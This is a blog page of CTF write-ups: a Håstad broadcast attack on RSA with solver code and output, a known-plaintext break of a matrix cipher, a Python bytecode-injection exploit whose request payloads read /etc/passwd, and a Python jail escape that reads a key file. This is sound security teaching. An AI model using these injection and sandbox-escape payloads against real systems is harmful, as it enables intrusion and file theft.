codezen.fr code hacking, zen coding

16Jan/14Off

HackYou 2014 – Crypto 400 – CRYPTONET

Posted by aXs

We have intercepted communication in a private network.
It is used a strange protocol based on RSA cryptosystem.

Can you still prove that it is not secure enough and get the flag?

We have a pcap files with multiples TCP sessions and a python script:

#!/usr/bin/python
import sys
import struct
import zlib
import socket

class Client:
  def __init__(self, ip):
    #init
    self.ip = ip
    self.port = 0x1337
    #connect
    self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.conn.connect((self.ip, self.port))
    #recieve e
    self.e = self.Recv()
    #recieve n
    self.n = self.Recv()
    self.e, self.n = int(self.e), int(self.n)

  def Recv(self):
    #unpack data
    length = struct.unpack('!H', self.conn.recv(2))
    data = zlib.decompress(self.conn.recv(length[0]))
    return data

  def Pack(self, data):
    #compress data
    data = zlib.compress('%s' % data)
    length = struct.pack('!H', len(data))
    return '%s%s' % (length, data)

  def Send(self, msg):
    #send message
    msg = int(msg.encode('hex'),16)
    assert(msg < self.n)
    msg = pow(msg, self.e, self.n)
    self.conn.send(self.Pack(msg))
    print '[+] Message send'

  def __del__(self):
    #close connection
    self.conn.close()

if len(sys.argv) != 2:
  print 'Usage: %s <ip>' % sys.argv[0]
  sys.exit(0)

flag = open('message.txt').readline()
test = Client(sys.argv[1])
test.Send(flag)

This is Textbook RSA and the tcp sessions are the same message being broadcasted by Alice to many Bobs, each Bob using a different public key (N)

This a classic example of the Håstad's Broadcast Attack on RSA.

Solution reusing parts of Christoph Egger's RuCTFe nsaless service write-up:

from struct import pack,unpack
import zlib
import gmpy

def my_parse_number(number):
    string = "%x" % number
    #if len(string) != 64:
    #    return ""
    erg = []
    while string != '':
        erg = erg + [chr(int(string[:2], 16))]
        string = string[2:]
    return ''.join(erg)

def extended_gcd(a, b):
    x,y = 0, 1
    lastx, lasty = 1, 0

    while b:
        a, (q, b) = b, divmod(a,b)
        x, lastx = lastx-q*x, x
        y, lasty = lasty-q*y, y

    return (lastx, lasty, a)

def chinese_remainder_theorem(items):
  N = 1
  for a, n in items:
    N *= n

  result = 0
  for a, n in items:
    m = N/n
    r, s, d = extended_gcd(n, m)
    if d != 1:
      raise "Input not pairwise co-prime"
    result += a*s*m

  return result % N, N

sessions = [
    ['192.168.001.005.33023','192.168.001.017.04919'],
    ['192.168.001.005.34806','192.168.001.021.04919'],
    ['192.168.001.005.35157','192.168.001.024.04919'],
    ['192.168.001.005.35915','192.168.001.027.04919'],
    ['192.168.001.005.37126','192.168.001.023.04919'],
    ['192.168.001.005.37754','192.168.001.020.04919'],
    ['192.168.001.005.39425','192.168.001.025.04919'],
    ['192.168.001.005.40439','192.168.001.011.04919'],
    ['192.168.001.005.41260','192.168.001.010.04919'],
    ['192.168.001.005.42465','192.168.001.028.04919'],
    ['192.168.001.005.42767','192.168.001.019.04919'],
    ['192.168.001.005.51710','192.168.001.018.04919'],
    ['192.168.001.005.52037','192.168.001.016.04919'],
    ['192.168.001.005.53328','192.168.001.012.04919'],
    ['192.168.001.005.54629','192.168.001.022.04919'],
    ['192.168.001.005.56537','192.168.001.015.04919'],
    ['192.168.001.005.56717','192.168.001.014.04919'],
    ['192.168.001.005.57646','192.168.001.013.04919'],
    ['192.168.001.005.59891','192.168.001.026.04919'],
]

data = []

for session in sessions:
    (source, destination) = session
    print source, destination
    message = open(source + "-" + destination, "rb").read()
    handshake = open(destination + "-" + source, "rb").read()

    buff = handshake

    length = unpack('!H', buff[0:2])[0]
    try:
        e = int(zlib.decompress(buff[2:2+length]))
        print "e=", e
    except:
        print "Zlib error for e"

    buff = buff[2+length:]

    length = unpack('!H', buff[0:2])[0]
    try:
        n = int(zlib.decompress(buff[2:2+length]))
        print "n=", n
    except:
        print "Zlib error for n"

    buff = message

    length = unpack('!H', buff[0:2])[0]
    try:
        msg = int(zlib.decompress(buff[2:2+length]))
        print "msg=", msg
    except:
        print "Zlib error for msg"

    data = data + [(msg, n)]

    print "-" * 80

print "Please wait, performing CRT"
x, n = chinese_remainder_theorem(data)
realnum = gmpy.mpz(x).root(e)[0].digits()
print my_parse_number(int(realnum))

Output:

$ python crypto400.py
192.168.001.005.33023 192.168.001.017.04919
e= 17
n= 25492165341402870943193342194243878583550091830588300179983190484677536677783878770091771426745020581968485223806403482688708690916599646206863308796421682192123291604607235755107364431209342465647517951497018019170871611821471577647494718032136027446239385000016582048814012025961200909864909126220898470337474181564969111740549293849528764155308076160637626891491670481790680054394999454113154731685789729310781453533838696397873008408145290785550608424077599753426457559997966726766077860415133627965054965186926286998932683118114065698789972581403018027054849591593302510627959868541308908688742433116746685957413
msg= 6666419060534882063445608631701254352058920974421822069727027885698959797948070412066328188514278918986722361742912500893728424745043197562231410354633167915385978833339701529722766937863212423943888214894271923064950171580353934178748023608466389268996754295631668202047874774966518214639701079489902676101992190471567121772228753020078695924075081945558620706927179092603126041395606016633822502612954885417984184184737630487502072507997213412593690188577996870365218951232207636278621674542750965270226225337180320970384418820119666789283194398074172939976925377054214851752639573115850958399373724855553234690869
--------------------------------------------------------------------------------
192.168.001.005.34806 192.168.001.021.04919
e= 17
n= 21127940129465859529449290710465142401626099761120448822896227957140612250511186166751154941578458258054285578274511450860570540828102070111370941358023009904308008795394643585864471986075987747216086746123427597776886622933600026324537947907678164739969468650427560672262831484437166952755098875024996456298734488381416586155715216067643259554486571154930556222002298362539331180176023831109425436177078457326927485711697356496728959762158514131974253928871967648747022232011642161107225163919743383709749413596786170516661129884422397760268997322898954161891328103774133077184028190158020665184081778231669390621447
msg= 3025342965063970983290961997148038673244905555308289391392896371605967574831912573039170667272658109340534212720805676884032065407092138739865486740854024452063900964324730683963944994250537553102328024132087660954040726648939149676030355851576763910670469390583200661923104138267998714166483656478619852365437776250801008285867722681155855008497404084448836122553221951674607943082229713841396761939215145379881979676835537964953725808825354819362797503568722134701601966504482232887162578922823026182148541889898696868501626860530484834082878781257554947276873624962134091380186322272011345017295000538738940807566
--------------------------------------------------------------------------------
192.168.001.005.35157 192.168.001.024.04919
e= 17
n= 22563350736629808264395772922819808510705484822245634475903533464108273973359621048788502042378085143059458230242646589967392945320090987067961491654357416853755261074531634683509015394347409817614889849143844247148479574777870355411207636748917532445668322051861338052906797819332259215278552079454184458015646487703430124222965707626399501332317111449272813630361908462924849723439803107908568327484445685641242797481816740336203447956828486867818411976997494338407256234593013250778655132122780432402623365698921928370817670245911505312288465537126236680323692662919137486755722237256218345361985595174086335811073
msg= 20135971165126329834498721501784512951499984648652660104821647741072871489936836442504197592142991669369919035304425516258391511301425226375564892415339365148509645261565560913559856659645387805198871549146172257882053281268795760344994001608956789940307816388486468042693545041073838774812997395437209060397149458050765177205158052575861667488415782153713633691372314235926019032628836133660245109281683465499593548858659962576728675714563027957143405441096816687188373864658407934159173393698714390810577718268693096568336071207238450039773940104963444157704166286892082172461258702049072827677476706096904316460964
--------------------------------------------------------------------------------
192.168.001.005.35915 192.168.001.027.04919
e= 17
n= 19697677554331221267369641184167188448335213481430897452143918418367154993523756864868509098839783053011355139590418269119504715550443490754762988015861768839038067134509092125205376509678043881070558825637905431885254727168679069330416776166369184375970521838169214107508952264240335498312849019213361951991190975616614804433716772411184993774461040690673753098373736933084616647869336141707774024488317582512216162403209135110515778522772939206567850540704356683976987508523230996026019768603629874558741038975853009975048175519392495212857366577161641687502674304846608725983145033337187267988999492371626182417551
msg= 14300174742950957133230867352717457897986205104543265825218842008467109972830138620119291505539500355334723376879888409251809364632635010202950500050892997355318105884900306620239365641681252935777362167024611054220484107153146560621083009306565476636270883588514007454668850327310521718849400741849368048026759782889674614052640379573508042637071620721869972662416840328750772187247907576009995766111841008793044576343182936834713229276992314777759684829492003814595802694592792453101320053268786720734738162720052909591108493186651733642823133001888727983206566194875945734575411295063088173363528901413605439659186
--------------------------------------------------------------------------------
192.168.001.005.37126 192.168.001.023.04919
e= 17
n= 22840174333461757597258965063503187552495604936013453813620970124752854692025931772152482715744058240571638175460349150353012889988723597821978579743499713766809084692254297539180932689148176677208822562008650864838388158004011554059006621226560748426334342736035675518932164604927602370423087532589029111052023317750367568915149473019058579728528211621618516222534404936592529521724927756742450435643292165615017136698859157488474841102297647488008004924900405006989945846311096537399030509947027554824768198503677139485403433484337602107191422279674605462427176871354240310242684337649527314815937448142118014471869
msg= 7269879938285087105060326068602691458154834670489063661854932312114567012381462325708324462473335735747751985833951832304054546004436096189761282474552769255043106817537407079708725883409397856635437608590617899532129476884853580275762892523609169600551500977086971018619327642914168273376084417345670925345416864822282780628646416374712921155883117431305185117831110048721693951865267141962666069350614792416053836803149161735632213430960384988586996269807413280397202373128437527421378900814241234271529460443131737298476049472736692048979564047934967259654010923397531158463241672904787724046355796318156683211693
--------------------------------------------------------------------------------
192.168.001.005.37754 192.168.001.020.04919
e= 17
n= 26181530231990596208912553982832841408036769882768643576772592303571004331051012292548525104394717484252349998434031623438917061404178468743247357634872314865905132523154238118481540371615056806756673945897771283881615017345596477766231957968854622033499073650939380455320632540323169565251694316300843433445667057555206872698949047971459662093473609973167299463621536822302820363096764742010575821082948519766535657152613824870739004432505303862201505469354785224205708777422229564239113870271947768783809029625932248575272642464554827073657622048405963388795704112995209429712517330431946725366254154641804680636843
msg= 6596498503473090384156122948918457693225694527543771961484972133896304927525029433085731957072789891646290597692421323936231128201822432631159176346646447011338805190482179145913035869942714613486895588754112366313438192851954663748505238329830016450238817308208066971617432717047936473721490905750275563930145038394216747562079905090073621918898708464447477835510214346908545028865672847041949340101722558962541612836311085196500521238354347015877914823677634283521373575663416167402249149782097385550791425270622816978948552969790013217066937461634555711434991830871731594480554761087920979267051612013063691897091
--------------------------------------------------------------------------------
192.168.001.005.39425 192.168.001.025.04919
e= 17
n= 18375116136153390105382127878395045588105857107246922094470216545244337357987681718168448429849698069981688291927806366721855289976121993055091218569849787514394507275481429728206429948836923251296672175100798033529862498578044854162615314211321712132747044363074981129056925717085204066189560133707352709019771792017200539059204024262019592851381317279368957556414371834469907989489823310736060223258994989400405121984031058976855896631117913090748375198718936570595983429517914008170697730495897896134771484309035561040862223201385431761693343426402858632921946359721016131084165400212811848077899966364178485645209
msg= 14450411368079644952604705871870024872670263251365527266862703716230778731191117713744962010138824834514424908701300856449356388617430510950535877723758382120583446269291649779277478125202353436896123871466945681583403794725306243733343462009791759823657466902546992816090954580754519785729524996046358307197773786618439603452776474869740548426942373102466687002398105444228516302695737600836706505822006007382861266883167162032588362091247091029707841718663522787461434574458986841049123553142254769053444081497788062775004085437066317446657655214417638414799100287660747244854718117257942197065271633812453504802118
--------------------------------------------------------------------------------
192.168.001.005.40439 192.168.001.011.04919
e= 17
n= 18856599160001833299560082802925753595735945621023660831294740454109973698430284916320395522883536507135735383517926050963512440162483065097256884040938259092582892259657340825971260278387406398529168309426241530551396056450450728728601248269612166083300938497235910244979946020059799495231539400114422748104072550004260736766137354572252872437140063474603268146956570787143010441293268321641092743010805639953103578977668248726500636191043930770036787317928372179939360510179438436665591755940224156131460271763912868322774604558314812111335691108887319827579162188169744014973478052491398688611046800951698773893393
msg= 9537600333774561965347809713893729543607050845183365456822389928272539309054686047543168922742589173859871008938711574330675462024831693796734766356934966684018899382045308313458440052017835494802986355673813464215184924837019853399388984893499187144821922554214143314640377079505897680854314880035458832414257859211958802973880776732222536460326269825765449639225220135735729106020282618914111685220841901015367575108920943148006106714487046602965253293770388951872741849791157534395777330833976209975828865170184061768114280467192574451716204110866562270737220078456700440400847759035001437357717203367869014507886
--------------------------------------------------------------------------------
192.168.001.005.41260 192.168.001.010.04919
e= 17
n= 27658060678038715780470429570597987144542213875178081185638364125349217264266787337266356239252353691015124430930507236433817624156361120645134956689683794554169169254645287613480048966030722812191823753459580311585866523664171185580520752591976764843551787247552790540802105791272457516072210641470817920157370947681970410336005860197552073763981521526496955541778866864446616347452950889748333309771690509856724643918258831575902389005661750464296924818808365029037591660424882588976607197196824985084365272217072807601787578262208488572448451271800547820717066767396857464594301327160705353075064322975430897551911
msg= 11433488612991990768536086698965180146550356348457563234735402111134701115830423042016221831657484325065472609147436229496479358788735270448637824809543880271526735635196884978639585020518147152207002685868984199742884443523231593245377292570809368330956970290791633106067116466080014631110596564728982066569618319541351401820732547227122970369299780366876340403436785218211729531092484723580223801525992510782266856454394478372421830988205823368541860973674259795969870252832216828042174346473447490557323038031625277043161510854825069681462499200978561823301487118145650943076528233694749306585201212677836363102350
--------------------------------------------------------------------------------
192.168.001.005.42465 192.168.001.028.04919
e= 17
n= 22946690762018202432990887189358840679847544298138130593179782494313283235656708793278294817370704179431587028797820098265221065047094111469387707851755805572030960917620048531944164128853858185996116085402185608208505862268300069081634690281361741089802822427014733500818400628218120217701065238981427409232531524810373504821405505784194458324112411450898914981925380408035843501140943840375415504531028291728110941191868468403264579853022847273710668909241386840084506302813524686512443804790681324357699954553042087787664048340322301999798211625015533291431249576149925507273846582715275085720997988716732564925247
msg= 22114155655659890875804525321139229042160702983880183010190613534988342335473532979092956071940843014846115113869717993343361412775761899123003515398037548495421246487341345482541093940292149812612966738017954607042366694074210348507360409383994155996445275183175086308877643260816760841714256410898269814908129813108551478627448054932601176813323889809069498060147451905095827442175810001123067159848367040168783825044279052630935945891964134230385303127654483691228319146427451587693985548002268250053416426728753739573823133295951972853182187229046285977320129680613905801285437766686995325893960172376926445625122
--------------------------------------------------------------------------------
192.168.001.005.42767 192.168.001.019.04919
e= 17
n= 24196427886175544349183151853220199349004334700026598710073455177858086301574503667298550711896472441115488666905450709605686892168468755356865839253905196330957826522203721667534054840325504585224175556167326100374628995111103938603447308160978852917872087343333848311844292367100647648063686677699135973596041567307784602998888789211145238333237613511049640509935260207585999606022736214748154785163367146044878537220691272581381812904389596150391959046627047758159235384420979630615278721284429066540058110867810807414175942667916940934372027878979861244401198531405584211810881235860988295519048177492135610751359
msg= 22296229997452473240404864600165019763565238056149885081619043661295445875270023158334098350603026725837611396891344057244652143898149482532106315521575872089742565470821567522946361662445964027209388657746191967435348044945947483621482721538186361050633595041353278781238956486769506373730884495108039610798833232749139421109269053404110580969203157360738738757856465985684697862079893042321411866940484105462672034009048091117594209570962168395344960105313171255329582011213721766675322731331965794652525786585751148977132545042466983433106614477836969990881581169493890539450115893703987635774477858244270608426284
--------------------------------------------------------------------------------
192.168.001.005.51710 192.168.001.018.04919
e= 17
n= 24360507764722702236982664735328841420311376027120399241078325497875531961885056309904114723678048613901842270612025644417215018351512175660269184968149109110209563435463873211914594529847294730496535258882010197028842516927468678843924092706088182566726725380495130934316582041447010080540555792802432876873205758297773353354773400601269072565235285553745651262991130015382601486699000167692446155692416347390954126585612460075052988874628884097103408004610717498543307677173210168954439627061348158046928463114067813191846253937179490050784167037265795606665046543869952157800016132040847485597002954075447344679099
msg= 2091608690891505258645949208946395204695041893228619053197065370886625848151228416356718762070352835427065857428605476603762875777761221509564315249418937215791628816353819422446178413024109351330646491084678357651148045128554746141683169277567849074245394149157710582616155738686711539953583528181614701953172972027101545253676978964454897005216320952879719740377602813279137554307680715749682175447559417772077472349519490785782899751615833622828868651966927604858524345638792811839384317780948838203430577334783095834911402913673850996431719159112716370014509918436690080118494876223156361387987999829094801210890
--------------------------------------------------------------------------------
192.168.001.005.52037 192.168.001.016.04919
e= 17
n= 20991361604317638769781823650579915779070848318189821239839863416933546421097820271887796260918963289144354691357223973152195364244222103627141268032857145421152363842224398828703305592221616019678102879125957325674007444034541160527072712208844228077449624475289619712846717432293230773279322231288635231839457560272849165524911202814516841260722542666841002263011069065414760944278124011800036869640840312097012211808948108758865722731922057521488153991477824974687229720412552981052793827211890557079895492457992364345889589127536307112174252490433421772585442393590767593690124636778449673348970938028847369589017
msg= 1176089662945377859394485590647428302230902074038834532187683920441006896963622996580792552532208518328678256998366963208028743204946660302538358531574765644007432906847438011315702121691613005078019506672007476291213237939507650616659336489497035998458925997634519034425449883103272960672562772204663037400144823802245320606039938019714906919958257594477982151857672916895153818922550365638890064326384677879791487276278839159022778493427572161764299809764447703117493013786755368150005501909964140795978310287946809348754988288402304994584145696550845106776916203635572397815715801968943287729470010695704992513284
--------------------------------------------------------------------------------
192.168.001.005.53328 192.168.001.012.04919
e= 17
n= 23536517244565831304957548822169291652207666754083340160306298208076886665065064843803465469409961704414510544566548897045751559184520942970858445270483458341528037499088946028024476760938334724064432942414803725235245083424464022066205458380170453189950900307248048617678876232312945996520402058770976469558803007764420552804210174247648614671097046399148333316029580244153775977135880775921663886951776404864678251750085264792097984094013284691977749495264267344834078278955171634785277609298558886471141768976455150174601039402280137908104589898954351484608783306378026577123527889651575952772820003380025546341093
msg= 2787570158312133794000264568955228362505478580337508384369847495327630702109418180218855630800765419691714135680571469213835542379448821209732447589306506369895651911135089075762137873889141680195343215032414145506957429427948190720862478335515596644926205381293106417410261520242246013085300698437878525197927303400003852408888917470597700285690342597850461091636279688711415205788329646890595805415907084665612141657880165938739423616058100283432682214722969192114128403177592988697839575450529126584549296274365360257579336454484779207708578834457262472129009056129647722165160424055970728939468425924742795247404
--------------------------------------------------------------------------------
192.168.001.005.54629 192.168.001.022.04919
e= 17
n= 22418240669078782395650685709211154715963189697089263104799144782938556049238670824036504767273510569815649054522706833230147726835488621722481390416868271627116267103118088021697808807092496788890564153300558617457948161343658932652189856049810225397121264480931341652674373238956664385611007077903271999938666531870525476577337484325119704138317723687164049779101614572637615019989722168840820998326371954897496744184510021746784303032310300111064058399012572181069622479162656626630666689745901678446100898000876596201969536772169761074060718581442841244466714693693744538078059538322489346225247976911833748299831
msg= 12741916458848035965674277226994440579915129055105462698845221890770558867890065973150125863687106455321192524282688850919026924493363241183706112792662939894532011809709158105688708409813198696055548036573709488504352009446189240170056000380659861236761237694775468132858916502459186242385986053427650331045218524574666652583364331482577973877822911369427036861116411565934292335204172142173748941863013032301778764886328258476195697934305418334527182261876183838908107190767800857337092015153451318295610430683371731834190637342265695335154669307530426675001781782217407160875559782488264585128426108095378548497650
--------------------------------------------------------------------------------
192.168.001.005.56537 192.168.001.015.04919
e= 17
n= 23980852037830754961843810384842109198680213599160124627608485316452067979221814287579031744661623974638029208789156178351485676131492416093947908129410491693261731404401473508295054358751129977958761373804386612048163148740071525591509234298601816819182717519183021983010112798883286143566969631969002952806398266165159329990930567027893909276078886841121244401773915309649928992691723658667402744292184927500507621943557420540056270730461740897601661594495028880708798531876866777269713984635553934853524715534003465120928659881608776745499441872048908380726942161563974610455635903901327036597201663594811207962219
msg= 6500753041357449855790208700753809194331642408448330624975108109751859721113916040913210608530117147284032825775613945416295553599499663257233673509345038912634968979540222246220460441613513695959331196716737175735741187191935319073270722811433035516074289343637773607521789970734447289501012767670625043452129332667983332570596510412510389935486708833483704894688513193020406791505432203906745860054901025547265075193156070642716676601268698224891768784422675343094235950805128869705790800102590177489342374151286188584127528879203511712056047898651580309669143955726928687269246843562481439718815596302692298516533
--------------------------------------------------------------------------------
192.168.001.005.56717 192.168.001.014.04919
e= 17
n= 20692935323456318857339636506121661409781600706918188791579569287363925379425076174758120076604134447812506062875425652061813752876711066070389233324351070782264123950482732919402628782987702034544299244918439112034234610691454353578647793100554890386226509128280993176780063155185886470116528236906519407444238424523493151082789442134440461004320839591569157239343299865825958454617581990948186838151424941117137818356712476559230872711658730923799079308488965817006179693410669320825141974869847267757553830878658559853061666130127729833856270147578804267991192625989184535593836836877723580138193263333297569871679
msg= 3149880252209031344712912478150309339789690396685866282400905925814536568350616764434288908486968492252351255022161340923513529850192573780350157980373627989388396346845656970516353356298790654832486310492079962338672745285854665147406015543850517102001543987674241995267846019477920439984122318278402925428057397039652213642437095694526592410641576952281061504190238132151689288080423425867830015832927809704559212420233819682781217618789216812964682441589327621971863380979777355679805008775337364919278947618188598427198109821307637144473819840409743353235834034795849314936322245339378447572244022235758755318197
--------------------------------------------------------------------------------
192.168.001.005.57646 192.168.001.013.04919
e= 17
n= 22182114562385985868993176463839749402849876738564142471647983947408274900941377521795379832791801082248237432130658027011388009638587979450937703029168222842849801985646044116463703409531938580410511097238939431284352109949200312466658018635489121157805030775386698514705824737070792739967925773549468095396944503293347398507980924747059180705269064441084577177316227162712249300900490014519213102070911105044792363935553422311683947941027846793608299170467483012199132849683112640658915359398437290872795783350944147546342693285520002760411554647284259473777888584007026980376463757296179071968120796742375210877789
msg= 16279989825796156802547712583633798298339885806436476356497796047229021124610630851145390462136716298450342674217575569196543919171078736243934669612002081179432014315465408489156509075853163302037413161239227506465361288161349464334942343016752593577869091378915378775289174914088843177811858916838452126433042585745992994815140378356718198629815818784659700720051966660786554920296721138381405607252098516473395177368859057746002895683463397630717358844874557866924382768279446164993249061647243362602307728771126094369384362246840728274885512559106673543101063171808938427459691773785819336680808200730383909434687
--------------------------------------------------------------------------------
192.168.001.005.59891 192.168.001.026.04919
e= 17
n= 21996468204721630460566169654781925102402634427772676287751800587544894952838038401189546149401344752771866376882226876072201426041697882026653772987648569053238451992877808811034545463363146057879646485465730317977739706776287970278094261290398668538232727000322458605289913900919015380904209692398479885177984131014170652915222062267448446642158394150657058846328033404309210836219241651882903083719822769947131283541299760283547938795574020478852839044803553093825730447126796668238131579735916546235889726257184058908852902241422169929720898025622336508382492878690496154797198800699611812166851455110635853297883
msg= 18919626944919001746434424216626233185707755539125451453498872012547818089480281584466165481221804279035723497497262166426771134459922980759121024951390547522550510734782168869364945944106404378597344695227319394862905382593128694330512816879360904284025740295670026092938765777154761403682710878968080966485091090198109371223563090698724814081281842426885356314840392128767155541449360105460941384985904101420698734690361896580259169275867969219822351776569430617405034594385605780084981880407657528516176335362438505224655581522137130777263875034088903829280901936110414932437809315770012018024957989707333743935907
--------------------------------------------------------------------------------
Please wait, performing CRT
Secret message! CTF{336b2196a2932c399c0340bc41cd362d}
Share
Tagged as: , , Comments Off
16Jan/14Off

HackYou 2014 – Crypto 300 – Do you like math? Write-up

Posted by aXs

Do you like math?

We have an encrypted flag.wmv.out file and this python script:

#!/usr/bin/python
import random
from struct import pack

def Str2matrix(s):
  #convert string to 4x4 matrix
  return [map(lambda x : ord(x), list(s[i:i+4])) for i in xrange(0, len(s), 4)]

def Matrix2str(m):
  #convert matrix to string
  return ''.join(map(lambda x : ''.join(map(lambda y : pack('!H', y), x)), m))

def Generate(password):
  #generate key matrix
  random.seed(password)
  return [[random.randint(0,64) for i in xrange(4)] for j in xrange(4)]

def Multiply(A,B):
  #multiply two 4x4 matrix
  C = [[0 for i in xrange(4)] for j in xrange(4)]
  for i in xrange(4):
    for j in xrange(4):
      for k in xrange(4):
        C[i][j] += A[i][k] * B[k][j]
  return C

def Encrypt(fname):
  #encrypt file
  key = Generate('')
  data = open(fname, 'rb').read()
  length = pack('!I', len(data))
  while len(data) % 16 != 0:
    data += '\x00'
  out = open(fname + '.out', 'wb')
  out.write(length)
  for i in xrange(0, len(data), 16):
    cipher = Multiply(Str2matrix(data[i:i+16]), key)
    out.write(Matrix2str(cipher))
  out.close()

Encrypt('flag.wmv')

To solve this challenge, analyzing the WMV file type is important.

The header of a WMV (ASF container actually) starts with a well-know 16 bytes sequence: the header GUID

So we know 16 bytes of plaintext and 16 bytes of corresponding ciphertext : that's enough to calculate the key

C = K * X
K = X-1 * C
P = K-1 * C

Here is a script automating this:

#!/usr/bin/python
from struct import pack,unpack
from numpy.linalg import inv

def Str2matrix(s):
    #convert string to 4x4 matrix
    return [map(lambda x: ord(x), list(s[i:i + 4])) for i in xrange(0, len(s), 4)]

def Words2matrix(s):
    #convert words to 4x4 matrix
    return [map(lambda x: x, list(s[i:i + 4])) for i in xrange(0, len(s), 4)]

def Matrix2str(m):
    #convert matrix to string
    return ''.join(map(lambda x: ''.join(map(lambda y: pack('!B', (y+0.05) % 256), x)), m))

def Multiply(A, B):
    #multiply two 4x4 matrix
    C = [[0 for i in xrange(4)] for j in xrange(4)]
    for i in xrange(4):
        for j in xrange(4):
            for k in xrange(4):
                C[i][j] += A[i][k] * B[k][j]
    return C

def to_words(string):
    i=0
    data = []
    while i<len(string):
      h = string[i:i+2]
      data.append(unpack('!H', h)[0])
      i+=2
    return data

def Decrypt(fname):
    data = open(fname, 'rb').read()

    # WMV GUID header
    plain = Str2matrix("30 26 b2 75 8e 66 cf 11  a6 d9 00 aa 00 62 ce 6c".replace(" ", "").decode("hex"))
    cipher = Words2matrix(to_words(data[4:4 + 32]))

    inv_plain = inv(plain)
    print "inv plain=", repr(inv_plain)

    key = Multiply(inv_plain, cipher)
    print "key=", repr(key)

    inv_key = inv(key)
    print "inv_key=", repr(inv_key)

    out = open('flag.wmv', 'wb')
    for i in xrange(4, len(data) - 4, 32):
        cipher = Words2matrix(to_words(data[i:i + 32]))
        print "cipher=", repr(cipher)
        plain = Multiply(cipher, inv_key)
        print "plain=", repr(plain)
        out.write(Matrix2str(plain))
    out.close()

Decrypt('flag.wmv.out')
Share
Tagged as: , Comments Off
17Dec/12Off

PHDays CTF Quals – Pwn300 SouthPark Write-Up – Python byte-code version

Posted by aXs

This challenge is about the control panel of the Southpark police department. (I wonder how many weird google searches I'm going to get on this post)

phd-pwn300-web

You can choose an action and a victim. When you submit the form, it's a simple AJAX call that will display "'human' was 'action'"

If we look closer at this ajax call we have some variables to play with:

&actions=kill&actions=arrest&actions=bankrupt&human=Kenny&choice=%00

We get the "source" code of this challenge in the form of 2 files, one web.py file and one compiled process.pyc file.

In web.py, we see we import the process.pyc:

  def render_POST(self, request):
    import process
    addition = "<br>"
    addition += process.process(request.args)
    response = addition
    return response

Using the great Uncompyle2 by Mysterie, we can recover the source code of process.pyc:

import types

def create_function(name, args_count, choice, actions, human):

    def y():
        pass

    code = 't' + choice + ''\x00d\x01\x00\x83\x01\x00S'
    consts = (None,) + (human,)
    names = actions
    fun = [args_count,
     y.func_code.co_nlocals,
     y.func_code.co_stacksize,
     y.func_code.co_flags,
     code,
     consts,
     names,
     y.func_code.co_varnames,
     y.func_code.co_filename,
     name,
     y.func_code.co_firstlineno,
     y.func_code.co_lnotab]
    y_code = types.CodeType(*fun)
    return types.FunctionType(y_code, y.func_globals, name)


def kill(name):
    return '%s was killed' % name


def arrest(name):
    return '%s was arrested' % name


def bankrupt(name):
    return '%s was bankrupted' % name


def process(args):
    actions = tuple(args['actions'])
    choice = args['choice'][0]
    human = args['human'][0]
    return create_function('myfunc', 0, choice, actions, human)()

create_function creates a Python lambda function from scratch and then returns it for consumption.

There is many ways to exploit this code because it calls a function name defined by the user in actions passing human as parameter like for example:

&actions=eval&human=str(open('/etc/passwd').read())&choice=%00

But I was intrigued by the "code" variable and the choice parameter which is inserted in the middle of what is Python byte-code. Can we exploit that for extra fun? (not extra points tough)

What is the purpose of:

code = 't' + choice + '\x00d\x01\x00\x83\x01\x00S'

Using Python dis module we can disassemble it: (comments are my own)

>>> import dis
>>> choice = '\x00'
>>> dis.dis('t' + choice + '\x00d\x01\x00\x83\x01\x00S')
          0 LOAD_GLOBAL         0 (0) // load actions (as globals=names)
          3 LOAD_CONST          1 (1) // load human on stack
          6 CALL_FUNCTION       1
          9 RETURN_VALUE

Calling a function named after "actions" passing the "human" parameter.

So we can craft the following Python byte-code injection:

&actions=open&actions=read&human=/etc/passwd&choice=%00%00d%01%00%83%01%00i%01%00%83%00%00St%00

This byte-code string can be decoded as doing this:

>>> dis.dis('t' + chr(0) + '\x00d\x01\x00\x83\x01\x00' + chr(105) +  chr(1) + '\x00\x83\x00\x00S' + 't' +  chr(0) + '\x00d\x01\x00\x83\x01\x00S')
          0 LOAD_GLOBAL         0 (0) // push first "actions" parameter on stack : open
          3 LOAD_CONST          1 (1) // push "human" parameter on stack : /etc/passwd
          6 CALL_FUNCTION       1     // open('/etc/passwd')
          9 LOAD_ATTR           1 (1) // load second "actions" parameter as a "read" attr for the open object created previously
         12 CALL_FUNCTION       0     // read the file content: open('/etc/passwd').read()
         15 RETURN_VALUE              // we bypass rest of original byte-code by inserting a RETURN_VALUE opcode, bit like # -- in SQLi
         16 LOAD_GLOBAL         0 (0) // original code
         19 LOAD_CONST          1 (1)
         22 CALL_FUNCTION       1
         25 RETURN_VALUE

And we get the flag:

# $FreeBSD: src/etc/master.passwd,v 1.42.2.1.2.2 2012/11/17 08:36:10 svnexp Exp $
#
root:*:0:0:Charlie & flag -> d9301a72ee12eabb2b913398a3fab50b:/root:/bin/csh
Share
25Oct/12Off

Hack.lu CTF – Python Jail Writeup

Posted by aXs

Challenge source code:

#!/usr/bin/env python
'''
Running instructions.
 sockets are insecure. We do not implement any socket behaviour in this
 file.
 Please make this file +x and run with socat:
    socat TCP-LISTEN:45454,fork EXEC:./chal.py,pty,stderr

Debugging:
 Just execute chal.py and play on terminal, no need to run socat

Note:
 This challenge is a tribute to PHDays Finals 2012 challenge 'ndevice'.
 Thanks again, I had fun solving it.
 
 I'm fairly certain that this challenge avoids being exploitable by
 the tricks we could use in PHDays (the module "os" was imported...).
 So, no advantage for people who did not attend PHDays.
 
'''

def make_secure():
        UNSAFE_BUILTINS = ['open',
         'file',
         'execfile',
         'compile',
         'reload',
         '__import__',
         'eval',
         'input'] ## block objet?
         for func in UNSAFE_BUILTINS:
           del __builtins__.__dict__[func]

from re import findall
make_secure()

print 'Go Ahead, Expoit me >;D'

while True:
    try:
      inp = findall('\S+', raw_input())[0]
      print "inp=", inp
      a = None
      exec 'a=' + inp
      print 'Return Value:', a
    except Exception, e:
      print 'Exception:', e

As you guessed it, we need to escape the jail and read the content of a file named "key".

Many many ways to solve this, I went with:

$ nc ctf.fluxfingers.net 2045

Go Ahead, Expoit me >;D
5;s=raw_input();exec(s)
f = (t for t in (42).__class__.__base__.__subclasses__() if t.__name__ == 'file').next()('key')
Return Value: 5
5;s=raw_input();exec(s)
a = f.read()
Return Value: FvibLF0eBkCBk
Share
Tagged as: , Comments Off
4Mar/12Off

Insomni’hack 2012 Network PCAP Write-ups

Posted by aXs

